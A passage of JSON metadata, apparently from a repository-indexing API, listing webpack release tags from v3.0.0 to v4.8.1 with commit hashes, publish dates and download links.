abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/r